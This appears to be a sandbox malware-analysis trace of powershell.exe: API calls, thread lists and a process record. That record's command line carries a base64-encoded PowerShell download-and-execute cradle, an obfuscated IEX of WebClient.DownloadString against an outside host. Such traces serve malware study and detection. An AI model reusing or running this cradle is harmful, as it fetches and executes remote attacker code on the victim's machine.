	[0947.854] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x5b8
	[0947.854] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x494
	[0947.854] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x1ec
	[0947.854] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x440
	[0947.854] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x7e8
	[0947.854] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x730
	[0947.854] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x2c8
	[0947.854] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x28dce0 | out: lpdwProcessId=0x28dce0) returned 0x31c
	[0947.858] WerSetFlags () returned 0x0
	[0948.572] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0948.572] CoTaskMemFree (pv=0x0) 
	[0948.573] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28e048, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28e040 | out: pulNumLanguages=0x28e048, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28e040) returned 1
	[0948.573] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28e048, pwszLanguagesBuffer=0x2c2f500, pcchLanguagesBuffer=0x28e040 | out: pulNumLanguages=0x28e048, pwszLanguagesBuffer=0x2c2f500, pcchLanguagesBuffer=0x28e040) returned 1
	[0948.579] CoTaskMemAlloc (cb=0x24) returned 0x13a550
	[0948.579] GetUserDefaultLocaleName (in: lpLocaleName=0x13a550, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0948.579] CoTaskMemFree (pv=0x13a550) 
	[0951.012] CoTaskMemAlloc (cb=0x104) returned 0x96fd0
	[0951.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x96fd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.012] CoTaskMemFree (pv=0x96fd0) 
	[0951.013] CoTaskMemAlloc (cb=0x104) returned 0x96fd0
	[0951.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x96fd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.014] CoTaskMemFree (pv=0x96fd0) 
	[0951.015] CoTaskMemAlloc (cb=0x104) returned 0x96fd0
	[0951.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x96fd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.015] CoTaskMemFree (pv=0x96fd0) 
	[0951.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.027] SetErrorMode (uMode=0x1) returned 0x1
	[0951.027] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28dcc0 | out: lpFileInformation=0x28dcc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0951.027] SetErrorMode (uMode=0x1) returned 0x1
	[0951.027] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28df30 | out: lpdwHandle=0x28df30) returned 0x94c
	[0951.028] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c32d90 | out: lpData=0x2c32d90) returned 1
	[0951.029] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28dea8, puLen=0x28dea0 | out: lplpBuffer=0x28dea8*=0x2c32e2c, puLen=0x28dea0) returned 1
	[0951.029] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c32f08, puLen=0x28de10) returned 1
	[0951.029] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0951.029] CoTaskMemAlloc (cb=0x2e) returned 0x130d60
	[0951.029] lstrcpyW (in: lpString1=0x130d60, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0951.029] CoTaskMemFree (pv=0x130d60) 
	[0951.029] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c32f5c, puLen=0x28de10) returned 1
	[0951.029] lstrlenW (lpString="System.Management.Automation") returned 28
	[0951.029] CoTaskMemAlloc (cb=0x3c) returned 0xa46a0
	[0951.029] lstrcpyW (in: lpString1=0xa46a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0951.030] CoTaskMemFree (pv=0xa46a0) 
	[0951.030] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c32fb8, puLen=0x28de10) returned 1
	[0951.030] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0951.030] CoTaskMemAlloc (cb=0x20) returned 0x13a5b0
	[0951.030] lstrcpyW (in: lpString1=0x13a5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0951.030] CoTaskMemFree (pv=0x13a5b0) 
	[0951.030] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c32ff8, puLen=0x28de10) returned 1
	[0951.030] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0951.030] CoTaskMemAlloc (cb=0x44) returned 0xa46a0
	[0951.030] lstrcpyW (in: lpString1=0xa46a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0951.030] CoTaskMemFree (pv=0xa46a0) 
	[0951.030] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c33060, puLen=0x28de10) returned 1
	[0951.030] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0951.030] CoTaskMemAlloc (cb=0x76) returned 0xd6330
	[0951.030] lstrcpyW (in: lpString1=0xd6330, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0951.030] CoTaskMemFree (pv=0xd6330) 
	[0951.030] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c330fc, puLen=0x28de10) returned 1
	[0951.030] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0951.030] CoTaskMemAlloc (cb=0x44) returned 0xa46a0
	[0951.030] lstrcpyW (in: lpString1=0xa46a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0951.030] CoTaskMemFree (pv=0xa46a0) 
	[0951.030] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c33160, puLen=0x28de10) returned 1
	[0951.030] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0951.030] CoTaskMemAlloc (cb=0x58) returned 0x84f00
	[0951.030] lstrcpyW (in: lpString1=0x84f00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0951.030] CoTaskMemFree (pv=0x84f00) 
	[0951.030] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c331dc, puLen=0x28de10) returned 1
	[0951.030] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0951.030] CoTaskMemAlloc (cb=0x20) returned 0x13a5b0
	[0951.030] lstrcpyW (in: lpString1=0x13a5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0951.030] CoTaskMemFree (pv=0x13a5b0) 
	[0951.030] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x2c32e84, puLen=0x28de10) returned 1
	[0951.030] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0951.030] CoTaskMemAlloc (cb=0x66) returned 0x134d60
	[0951.031] lstrcpyW (in: lpString1=0x134d60, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0951.031] CoTaskMemFree (pv=0x134d60) 
	[0951.031] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x0, puLen=0x28de10) returned 0
	[0951.031] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x0, puLen=0x28de10) returned 0
	[0951.031] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28de18, puLen=0x28de10 | out: lplpBuffer=0x28de18*=0x0, puLen=0x28de10) returned 0
	[0951.031] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28dde8, puLen=0x28dde0 | out: lplpBuffer=0x28dde8*=0x2c32e2c, puLen=0x28dde0) returned 1
	[0951.031] CoTaskMemAlloc (cb=0x204) returned 0x13af00
	[0951.031] VerLanguageNameW (in: wLang=0x0, szLang=0x13af00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0951.031] CoTaskMemFree (pv=0x13af00) 
	[0951.031] VerQueryValueW (in: pBlock=0x2c32d90, lpSubBlock="\\", lplpBuffer=0x28de38, puLen=0x28de30 | out: lplpBuffer=0x28de38*=0x2c32db8, puLen=0x28de30) returned 1
	[0951.037] CoTaskMemAlloc (cb=0x104) returned 0x96fd0
	[0951.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x96fd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.037] CoTaskMemFree (pv=0x96fd0) 
	[0951.039] CoTaskMemAlloc (cb=0x104) returned 0x96fd0
	[0951.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x96fd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.039] CoTaskMemFree (pv=0x96fd0) 
	[0951.044] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dd08 | out: phkResult=0x28dd08*=0x2f8) returned 0x0
	[0951.045] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dcf8 | out: phkResult=0x28dcf8*=0x2fc) returned 0x0
	[0951.045] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dd88 | out: phkResult=0x28dd88*=0x300) returned 0x0
	[0951.048] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dccc, lpData=0x0, lpcbData=0x28dcc8*=0x0 | out: lpType=0x28dccc*=0x1, lpData=0x0, lpcbData=0x28dcc8*=0x56) returned 0x0
	[0951.048] CoTaskMemAlloc (cb=0x5a) returned 0x134cf0
	[0951.049] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc9c, lpData=0x134cf0, lpcbData=0x28dc98*=0x56 | out: lpType=0x28dc9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28dc98*=0x56) returned 0x0
	[0951.049] CoTaskMemFree (pv=0x134cf0) 
	[0951.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.051] CoTaskMemAlloc (cb=0x104) returned 0x96fd0
	[0954.051] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x96fd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.051] CoTaskMemFree (pv=0x96fd0) 
	[0956.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0956.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0957.008] CoTaskMemAlloc (cb=0x104) returned 0x147520
	[0957.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.008] CoTaskMemFree (pv=0x147520) 
	[0957.010] CoTaskMemAlloc (cb=0x104) returned 0x147520
	[0957.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.010] CoTaskMemFree (pv=0x147520) 
	[0957.538] CoTaskMemAlloc (cb=0x104) returned 0x147520
	[0957.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.538] CoTaskMemFree (pv=0x147520) 
	[0957.539] CoTaskMemAlloc (cb=0x104) returned 0x147520
	[0957.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.539] CoTaskMemFree (pv=0x147520) 
	[0957.539] CoTaskMemAlloc (cb=0x104) returned 0x147520
	[0957.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.539] CoTaskMemFree (pv=0x147520) 
	[0958.991] CoTaskMemAlloc (cb=0x104) returned 0x13af00
	[0958.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13af00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.991] CoTaskMemFree (pv=0x13af00) 
	[0958.994] CoTaskMemAlloc (cb=0x104) returned 0x13af00
	[0958.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13af00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.995] CoTaskMemFree (pv=0x13af00) 
	[0959.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0959.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0967.837] CoTaskMemAlloc (cb=0x104) returned 0xd2030
	[0967.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.837] CoTaskMemFree (pv=0xd2030) 
	[0967.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0968.158] SetErrorMode (uMode=0x1) returned 0x1
	[0968.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x28dc60 | out: lpFileInformation=0x28dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0968.159] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 449
	os_tid = 0x10f0


Thread:
	id = 458
	os_tid = 0x1120


Thread:
	id = 946
	os_tid = 0x194c


Thread:
	id = 948
	os_tid = 0x1960


Thread:
	id = 965
	os_tid = 0x19d4


Thread:
	id = 1069
	os_tid = 0xb80


Thread:
	id = 1615
	os_tid = 0x21f4


Thread:
	id = 1616
	os_tid = 0x21f8

	[0829.293] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Process:
	id = "85"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6afc9000"
	os_pid = "0x54c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 380
	os_tid = 0xe34

	[0449.411] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0450.650] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0450.650] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0450.650] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0450.650] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0454.142] GetVersionExW (in: lpVersionInformation=0x1ade60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ade60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0454.144] GetVersionExW (in: lpVersionInformation=0x1ade60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ade60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0454.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ada80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0454.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0454.799] GetVersionExW (in: lpVersionInformation=0x1adbd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adbd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0454.800] SetErrorMode (uMode=0x1) returned 0x1
	[0454.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1add30 | out: lpFileInformation=0x1add30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0454.802] SetErrorMode (uMode=0x1) returned 0x1
